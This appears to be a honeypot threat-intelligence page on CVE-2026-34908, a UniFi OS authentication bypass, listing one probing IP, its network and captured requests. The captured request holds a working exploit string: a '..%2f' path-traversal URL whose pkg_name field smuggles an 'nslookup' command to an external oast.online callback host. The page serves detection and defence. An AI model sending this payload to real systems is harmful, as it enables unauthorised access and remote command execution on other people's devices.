CVE-2026-34908: UniFi OS - Authentication Bypass via Path Traversal (..%2f)

HoneyLabs honeypots recorded 1 probes matching CVE-2026-34908 from 1 distinct source IP addresses in the last 7 days. Severity is rated critical.

This CVE is on CISA's Known Exploited Vulnerabilities list.

Request paths that identify it

  • /api/auth/validate-sso/..%2f..%2f..%2fproxy/users/api/v2/ucs/update/latest_package

Addresses probing it

Source IPProbesNetworkCountry
93.123.109.2141Techoff Srv LimitedBulgaria

Networks it comes from

ASNOrganisationProbesSource IPs
AS48090Techoff Srv Limited11

Captured requests

  • /api/auth/validate-sso/..%2f..%2f..%2fproxy/users/api/v2/ucs/update/latest_package?pkg_name=%3b+nslookup+dat5s2dr4bohuvf6jbkgz4u5ahg7y5gmf.oast.online+%3b

CVE report

CVE report

Open a specific CVE from the CVE tracker.